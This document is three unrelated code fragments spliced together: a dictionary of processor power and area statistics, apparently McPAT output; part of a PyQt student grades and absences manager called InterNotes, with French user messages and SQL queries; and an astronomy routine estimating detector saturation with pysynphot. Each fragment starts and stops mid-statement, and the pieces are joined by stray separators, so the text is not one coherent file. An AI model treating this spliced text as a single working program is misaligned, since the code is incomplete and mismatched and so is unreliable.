'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.270596,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.13903,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.363257,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.72826,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0207825,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0139406,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.108534,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.103099,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.129317,
'Execution Unit/Register Files/Runtime Dynamic': 0.11704,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.233786,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.744217,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.62449,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00091853,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00091853,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000809584,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000318624,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00148103,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00412767,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00846572,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0991119,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.30437,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.224509,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.336629,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.82885,
'Instruction Fetch Unit/Runtime Dynamic': 0.672843,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0452693,
'L2/Runtime Dynamic': 0.0173384,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 5.58517,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.11292,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.14067,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.14067,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 6.24945,
'Load Store Unit/Runtime Dynamic': 2.94733,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.346868,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.693736,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.123105,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.123767,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.391982,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0368556,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.759563,
'Memory Management Unit/Runtime Dynamic': 0.160623,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 24.2009,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0546688,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0156604,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.17509,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': | |
+
u"vous devez indiquer l'heure de départ et l'heure d'arrivée")
return
if h_from > h_to:
QMessageBox.critical(self, u"Error - InterNotes",
u"Pour chaque absence, " +
u"l'heure de départ doit être inférieur à l'heure d'arrivée")
return
if 'away_id' in away_data[a]:
self.updateOldAway(away_data[a]['away_id'], away_data[a]['away_date'],
away_data[a]['away_time_from'], away_data[a]['away_time_to'],
away_data[a]['away_justify'],
away_data[a]['away_motif'], away_data[a]['away_period'], stid)
else:
aid = self.insertNewAway(away_data[a]['away_date'], away_data[a]['away_time_from'],
away_data[a]['away_time_to'],
away_data[a]['away_justify'], away_data[a]['away_motif'],
away_data[a]['away_period'], stid)
# put the new away_id here
if flag == True:
item_motif = away_data[a]['item_motif']
item_motif.setData(Qt.AccessibleTextRole,
QVariant(aid))
def onClickedSaveBtn(self):
data = self.getAllNewMarksFromTableView()
if data:
self.saveMarks(data, self.stid, data[0]['classroom_id'],
data[0]['academic_year_id'], True)
if self.btn_save:
self.btn_save.setEnabled(False)
self.deleteRemovablesMarks()
def onClickedSaveAwayBtn(self):
data = self.getAllNewAwaysFromTableView()
if data:
self.saveAways(data, self.stid, True)
if self.btn_save_away:
self.btn_save_away.setEnabled(False)
self.deleteRemovablesAways()
def getAllNewMarksFromTableView(self):
marks = []
if self.combo_classroom.currentIndex() != -1:
ay_index = self.combo_ay.currentIndex()
cr_index = self.combo_classroom.currentIndex()
crid = self.combo_classroom.itemData(cr_index).toInt()[0]
ayid = self.combo_ay.itemData(ay_index).toInt()[0]
mark_group = self.combo_mark_group.currentText()
if self.table_view.rowCount() > 0:
nb_row = self.table_view.rowCount()
for r in range(0, nb_row):
mark = {}
combo_topic = self.table_view.cellWidget(r, 0)
topic_index = combo_topic.currentIndex()
mark['topic_id'] = combo_topic.itemData(topic_index).toInt()[0]
mark_id = self.table_view.item(r, 3).data(Qt.AccessibleTextRole).toInt()[0]
if mark_id:
mark['mark_id'] = mark_id
mark['mark_mark'] = self.table_view.cellWidget(r, 1).value()
mark['mark_level'] = self.table_view.cellWidget(r, 2).value()
mark['item_observation'] = self.table_view.item(r, 3)
mark['mark_observation'] = self.table_view.item(r, 3).text()
#self.student_birth_date.date().toString("dd/MM/yyyy"),
date_edit = self.table_view.cellWidget(r, 4)
mark['mark_date'] = date_edit.date().toString("dd/MM/yyyy")
mark['mark_group'] = mark_group
mark['classroom_id'] = crid
mark['academic_year_id'] = ayid
marks.append(mark)
return marks
def getAllNewAwaysFromTableView(self):
aways = []
if self.combo_classroom.currentIndex() != -1:
mark_group = self.combo_mark_group_away.currentText()
if self.table_view_away.rowCount() > 0:
nb_row = self.table_view_away.rowCount()
for r in range(0, nb_row):
away = {}
date_edit = self.table_view_away.cellWidget(r, 0)
away['away_date'] = date_edit.date().toString("dd/MM/yyyy")
time_from_edit = self.table_view_away.cellWidget(r, 1)
away['away_time_from'] = time_from_edit.time().toString("hh:mm")
time_to_edit = self.table_view_away.cellWidget(r, 2)
away['away_time_to'] = time_to_edit.time().toString("hh:mm")
combo_justify = self.table_view_away.cellWidget(r, 3)
away['away_justify'] = combo_justify.currentText()
away_id = self.table_view_away.item(r, 4).data(Qt.AccessibleTextRole).toInt()[0]
if away_id:
away['away_id'] = away_id
away['item_motif'] = self.table_view_away.item(r, 4)
away['away_motif'] = self.table_view_away.item(r, 4).text()
#self.student_birth_date.date().toString("dd/MM/yyyy"),
away['away_period'] = mark_group
aways.append(away)
return aways
def isStudentHasMarksInThisClassroomId(self, crid):
query = QSqlQuery("SELECT * FROM mark WHERE classroom_id = " + str(crid))
if query.exec_():
if query.size() >= 1:
return True
else:
return False
def setTableMarksByClassroomIndexChanged(self):
mark_group_index = self.combo_mark_group.currentIndex()
self.combo_mark_group.setCurrentIndex(-1)
self.combo_mark_group.setCurrentIndex(0)
self.setTableMarksByStudentIdAndByMarkGroup(0)
def setTableMarksByStudentIdAndByMarkGroup(self, group_index):
if self.combo_classroom.currentIndex() == -1 or self.stid == None:
return
else:
ay_index = self.combo_ay.currentIndex()
cr_index = self.combo_classroom.currentIndex()
crid = self.combo_classroom.itemData(cr_index).toInt()[0]
if self.isStudentHasMarksInThisClassroomId(crid) == False:
return
mark_group = self.combo_mark_group.currentText()
query = QSqlQuery()
query.prepare("SELECT * \
FROM mark m \
INNER JOIN topic t USING(topic_id) \
WHERE student_id = :stid AND \
mark_group = :group \
ORDER BY t.topic_name, mark_date DESC")
query.bindValue(":stid", self.stid)
query.bindValue(":group", mark_group)
if query.exec_():
record = query.record()
if not record.isEmpty():
self.table_view.setRowCount(query.size())
nb_row = query.size()
items = []
for r in range(0, nb_row):
self.table_view.setRowHeight(r, 20)
while query.next():
row = {}
mark_id = query.value(record.indexOf("mark_id")).toInt()[0]
mark_mark = query.value(record.indexOf("mark_mark")).toDouble()[0]
mark_level = query.value(record.indexOf("mark_level")).toInt()[0]
mark_observation = query.value(record.indexOf("mark_observation")).toString()
mark_date_string = query.value(record.indexOf("mark_date")).toString()
l_date = mark_date_string.split("/")
y = l_date[2].toInt()[0]
m = l_date[1].toInt()[0]
d = l_date[0].toInt()[0]
new_date = QDate(y, m, d)
mark_date_edit = QDateEdit(new_date)
mark_date_edit.setCalendarPopup(True)
mark_date_edit.setDisplayFormat(u"dd/MM/yyyy")
topic_id = query.value(record.indexOf("topic_id")).toInt()[0]
#item_name = QTableWidgetItem(topic_name)
#item_name.setData(Qt.AccessibleTextRole, QVariant(topic_id))
row['mark_id'] = mark_id
row['mark_mark'] = mark_mark
row['mark_level'] = mark_level
row['mark_observation'] = mark_observation
row['mark_date'] = mark_date_edit
row['topic_id'] = topic_id
items.append(row)
for i in range(0, len(items)):
combo_topic = QComboBox()
if self.combo_classroom.currentIndex() != -1:
cr_index = self.combo_classroom.currentIndex()
crid = self.combo_classroom.itemData(cr_index).toInt()[0]
topics = topic.Topic.getAllTopicsByClassroomId(crid)
for t in topics:
combo_topic.addItem(t['topic_name'], QVariant(t['topic_id']))
mark_topic_name = topic.Topic.getNameById(items[i]['topic_id'])
index = combo_topic.findText(mark_topic_name)
combo_topic.setCurrentIndex(index)
self.table_view.setCellWidget(i, 0, combo_topic)
spin_mark = QDoubleSpinBox()
#spin_mark.setMinimum(1)
spin_mark.setValue(items[i]['mark_mark'])
self.table_view.setCellWidget(i, 1, spin_mark)
spin_level = QSpinBox()
spin_level.setMinimum(10)
spin_level.setSingleStep(10)
spin_level.setValue(items[i]['mark_level'])
self.table_view.setCellWidget(i, 2, spin_level)
item_observation = QTableWidgetItem(items[i]['mark_observation'])
item_observation.setData(Qt.AccessibleTextRole, QVariant(items[i]['mark_id']))
self.table_view.setItem(i, 3, item_observation)
self.table_view.setCellWidget(i, 4, items[i]['mark_date'])
self.connect(combo_topic, SIGNAL("currentIndexChanged(int)"),
self.activeSaveBtn)
self.connect(spin_mark, SIGNAL("valueChanged(double)"),
self.activeSaveBtn)
self.connect(spin_level, SIGNAL("valueChanged(int)"),
self.activeSaveBtn)
self.connect(items[i]['mark_date'], SIGNAL("dateChanged(QDate)"),
self.activeSaveBtn)
self.table_view.sortItems(4)
def setTableAwaysByStudentIdAndByMarkGroup(self, group_index):
if self.combo_classroom.currentIndex() == -1 or self.stid == None:
return
"""
else:
ay_index = self.combo_ay.currentIndex()
cr_index = self.combo_classroom.currentIndex()
crid = self.combo_classroom.itemData(cr_index).toInt()[0]
if self.isStudentHasMarksInThisClassroomId(crid) == False:
return
"""
mark_group = self.combo_mark_group_away.currentText()
query = QSqlQuery()
query.prepare("SELECT * \
FROM away a \
WHERE student_id = :stid AND \
away_period = :period \
ORDER BY a.away_date DESC")
query.bindValue(":stid", self.stid)
query.bindValue(":period", mark_group)
if query.exec_():
record = query.record()
if not record.isEmpty():
self.table_view_away.setRowCount(query.size())
nb_row = query.size()
items = []
for r in range(0, nb_row):
self.table_view_away.setRowHeight(r, 20)
while query.next():
row = {}
away_id = query.value(record.indexOf("away_id")).toInt()[0]
away_justify = query.value(record.indexOf("away_justify")).toString()
away_motif = query.value(record.indexOf("away_motif")).toString()
away_date_string = query.value(record.indexOf("away_date")).toString()
l_date = away_date_string.split("/")
y = l_date[2].toInt()[0]
m = l_date[1].toInt()[0]
d = l_date[0].toInt()[0]
new_date = QDate(y, m, d)
away_date_edit = QDateEdit(new_date)
away_date_edit.setCalendarPopup(True)
away_date_edit.setDisplayFormat(u"dd/MM/yyyy")
away_time_from_string = query.value(record.indexOf("away_time_from")).toString()
l_time = away_time_from_string.split(":")
h = l_time[0].toInt()[0]
m = l_time[1].toInt()[0]
new_time = QTime(h, m)
away_time_from_edit = QTimeEdit()
away_time_from_edit.setDisplayFormat(u"hh:mm")
away_time_from_edit.setTime(new_time)
away_time_to_string = query.value(record.indexOf("away_time_to")).toString()
l_time = away_time_to_string.split(":")
h = l_time[0].toInt()[0]
m = l_time[1].toInt()[0]
new_time = QTime(h, m)
away_time_to_edit = QTimeEdit()
away_time_to_edit.setDisplayFormat(u"hh:mm")
away_time_to_edit.setTime(new_time)
row['away_id'] = away_id
row['away_date'] = away_date_edit
row['away_time_from'] = away_time_from_edit
row['away_time_to'] = away_time_to_edit
row['away_justify'] = away_justify
row['away_motif'] = away_motif
items.append(row)
for i in range(0, len(items)):
self.table_view_away.setCellWidget(i, 0, items[i]['away_date'])
self.table_view_away.setCellWidget(i, 1, items[i]['away_time_from'])
self.table_view_away.setCellWidget(i, 2, items[i]['away_time_to'])
combo_justify = QComboBox()
combo_justify.addItem(u"Non Justifiée")
combo_justify.addItem(u"Justifiée")
index = combo_justify.findText(items[i]["away_justify"])
combo_justify.setCurrentIndex(index)
self.table_view_away.setCellWidget(i, 3, combo_justify)
item_motif = QTableWidgetItem(items[i]['away_motif'])
item_motif.setData(Qt.AccessibleTextRole, QVariant(items[i]['away_id']))
self.table_view_away.setItem(i, 4, item_motif)
self.connect(items[i]['away_time_from'], SIGNAL("timeChanged(QTime)"),
self.activeSaveAwayBtn)
self.connect(items[i]['away_time_to'], SIGNAL("timeChanged(QTime)"),
self.activeSaveAwayBtn)
self.connect(items[i]['away_date'], SIGNAL("dateChanged(QDate)"),
self.activeSaveAwayBtn)
self.connect(combo_justify, SIGNAL("currentIndexChanged(int)"),
self.activeSaveAwayBtn)
self.table_view_away.sortItems(0)
def saveNewMarks(self, marks, student_id, classroom_id):
for m in range(0, len(marks)):
if marks[m]['mark_level'] <= 1:
QMessageBox.critical(self, u"Error - InterNotes", u"Impossible d'enregistrer " +
u"le(s) note(s). Veuillez renseigner " +
u"le total de point pour chaque note")
return
query = QSqlQuery()
query.prepare("INSERT INTO mark( \
mark_mark, \
mark_level, \
mark_observation, \
mark_date, \
mark_group, \
student_id, \
topic_id, \
classroom_id, \
academic_year_id, \
mark_created_at) \
VALUES( \
:mark, \
:level, \
:observation, \
:date, \
:group, \
:stid, \
:tid, \
:crid, \
:ayid, \
NOW())")
query.bindValue(":mark", marks[m]['mark_mark'])
query.bindValue(":level", marks[m]['mark_level'])
query.bindValue(":observation", marks[m]['mark_observation'])
query.bindValue(":date", marks[m]['mark_date'])
query.bindValue(":group", marks[m]['mark_group'])
query.bindValue(":stid", student_id)
query.bindValue(":tid", marks[m]['topic_id'])
query.bindValue(":crid", classroom_id)
query.bindValue(":ayid", marks[m]['academic_year_id'])
if not query.exec_():
QMessageBox.critical(self, "Error - InterNotes",
u"Database Error: %s" % query.lastError().text())
return
else:
self.stat_page.stat_object_tree.updateStatObjectTree()
self.stat_page.stat_feature_tree.clear()
self.stat_page.stat_feature_tree.setHeaderLabel(u"")
child = self.stat_page.stat_output.layout.takeAt(0)
if child:
child.widget().deleteLater()
def appendNewStudentItem(self, infos):
ayid = infos['ay_id']
clid = infos['class_id']
crid = infos['classroom_id']
marks = infos['marks']
query = QSqlQuery()
query.prepare("INSERT INTO student(\
student_first_name, \
student_last_name, \
student_birth_date, \
student_birth_place, \
student_genre, \
student_height, \
student_matricule, \
student_matricule_ministeriel, \
student_statut, \
student_previous_school, \
student_previous_classroom, \
student_redoubler, \
student_email, \
student_phone1, \
student_phone2, \
student_phone3, \
student_photo_name, \
student_created_at, \
academic_year_id, \
class_id, \
classroom_id) \
VALUES( \
:first_name, \
:last_name, \
:birth_date, \
:birth_place, \
:genre, \
:height, \
:matricule, \
:matricule_ministeriel, \
:statut, \
:previous_school, \
:previous_classroom, \
:redoubler, \
:email, \
:phone1, \
:phone2, \
:phone3, \
:photo_name, \
NOW(), \
:ay_id, \
:clid, \
:crid)")
query.bindValue(":first_name", infos['student_first_name'])
query.bindValue(":last_name", infos['student_last_name'])
query.bindValue(":birth_date", infos['student_birth_date'])
query.bindValue(":birth_place", infos['student_birth_place'])
query.bindValue(":genre", infos['student_genre'])
query.bindValue(":height", infos['student_height'])
query.bindValue(":matricule", infos['student_matricule'])
query.bindValue(":matricule_ministeriel", infos['student_matricule_ministeriel'])
query.bindValue(":statut", infos['student_statut'])
query.bindValue(":previous_school", infos['student_previous_school'])
query.bindValue(":previous_classroom", infos['student_previous_classroom'])
query.bindValue(":redoubler", infos['student_redoubler'])
query.bindValue(":email", infos['student_email'])
query.bindValue(":phone1", infos['student_phone1'])
query.bindValue(":phone2", infos['student_phone2'])
query.bindValue(":phone3", infos['student_phone3'])
query.bindValue(":photo_name", infos['new_photo_file_name'])
query.bindValue(":ayid", ayid)
query.bindValue(":clid", clid)
query.bindValue(":crid", crid)
if not query.exec_():
QMessageBox.critical(self, u"Error - InterNotes",
u"Database Error: %s" % query.lastError().text())
else:
new_student_id = query.lastInsertId().toInt()[0]
if marks:
self.saveNewMarks(marks, new_student_id, crid)
ni = QStandardItem(infos['student_last_name'] + " " +
infos['student_first_name'])
#ni.setData(0, 11, QVariant(new_student_id))
ni.setAccessibleText(QString.number(new_student_id))
ni.setEditable(False)
if infos['new_photo_file_name'] is not None and not \
infos['new_photo_file_name'].isEmpty() and not \
QImage(infos['new_photo_file_name']).isNull():
ni.setIcon(QIcon(infos['new_photo_file_name']))
else:
ni.setIcon(QIcon(":/images/user-icon.png"))
query.finish()
std_nb = 0
if len(self.list_room_id):
if crid in self.list_room_id:
self.model.appendRow(ni)
for id in range(0, len(self.list_room_id)):
std_nb += classe.Class.getNumberOfStudentInThisClassroomById(
self.list_room_id[id])
self.model.setHorizontalHeaderLabels(
QStringList(u"Elèves - Nom et prenoms (%i)" % std_nb))
self.stat_page.stat_object_tree.updateStatObjectTree()
self.stat_page.stat_feature_tree.clear()
self.stat_page.stat_feature_tree.setHeaderLabel(u"")
child = self.stat_page.stat_output.layout.takeAt(0)
if child:
child.widget().deleteLater()
def editStudentItem(self, infos):
ayid = infos['ay_id']
clid = infos['class_id']
crid = infos['classroom_id']
stid = infos['student_id']
mark_data = infos['mark_data']
away_data = infos['away_data']
current_item = infos['item']
query = QSqlQuery()
query.prepare("UPDATE student \
SET student_first_name = :first_name, \
student_last_name = :last_name, \
student_birth_date = :birth_date, \
student_birth_place = :birth_place, \
student_genre = :genre, \
student_height = :height, \
student_matricule = :matricule, \
student_matricule_ministeriel = :matricule_ministeriel, \
student_statut = :statut, \
student_previous_school = :previous_school, \
student_previous_classroom = :previous_classroom, \
student_redoubler = :redoubler, \
student_email = :email, \
student_phone1 = :phone1, \
student_phone2 = :phone2, \
student_phone3 = :phone3, \
student_photo_name = :photo_name, \
student_updated_at | |
None:
sp = stellar_spectrum('G2V')
# Just for good measure, make sure we're all in the same wave units
bp_lim.convert(bp.waveunits)
sp.convert(bp.waveunits)
# Renormalize to 10th magnitude star (Vega mags)
mag_norm = 10.0
sp_norm = sp.renorm(mag_norm, 'vegamag', bp_lim)
sp_norm.name = sp.name
# Set up an observation of the spectrum using the specified bandpass
# Use the bandpass wavelengths to bin the fluxes
obs = S.Observation(sp_norm, bp, binset=bp.wave)
# Convert observation to counts (e/sec)
obs.convert('counts')
# The number of pixels to span spatially
fov_pix = int(fov_pix)
oversample = int(oversample)
# Generate the PSF image for analysis
t0 = time.time()
result = gen_image_coeff(bp, pupil=pupil, mask=mask, module=module,
sp_norm=sp_norm, coeff=coeff, coeff_hdr=coeff_hdr,
fov_pix=fov_pix, oversample=oversample,
offset_r=offset_r, offset_theta=offset_theta, **kwargs)
t1 = time.time()
_log.debug('Took %.2f seconds to generate images' % (t1-t0))
# Total stellar flux and associated magnitude
star_flux = obs.countrate() # e/sec
mag_nrc = obs.effstim('vegamag')
_log.debug('Total Source Count Rate for {0} = {1:0.1f} mags: {2:.0f} e-/sec'.\
format(bp_lim.name, mag_norm, star_flux))
_log.debug('Magnitude in {0} band: {1:.2f}'.format(bp.name, mag_nrc))
# Saturation level (some fraction of full well) in electrons
sat_level = well_frac * full_well
# If grism spectroscopy
if (pupil is not None) and ('GRISM' in pupil):
wspec, spec = result
# Time to saturation for 10-mag source
sat_time = sat_level / spec
_log.debug('Approximate Time to {1:.2f} of Saturation: {0:.1f} sec'.\
format(sat_time.min(),well_frac))
# Magnitude necessary to saturate a given pixel
ratio = int_time/sat_time
ratio[ratio < __epsilon] = __epsilon
sat_mag = mag_norm + 2.5*np.log10(ratio)
# Wavelengths to grab saturation values
igood2 = bp.throughput > (bp.throughput.max()/4)
wgood2 = bp.wave[igood2] / 1e4
wsat_arr = np.unique((wgood2*10 + 0.5).astype('int')) / 10
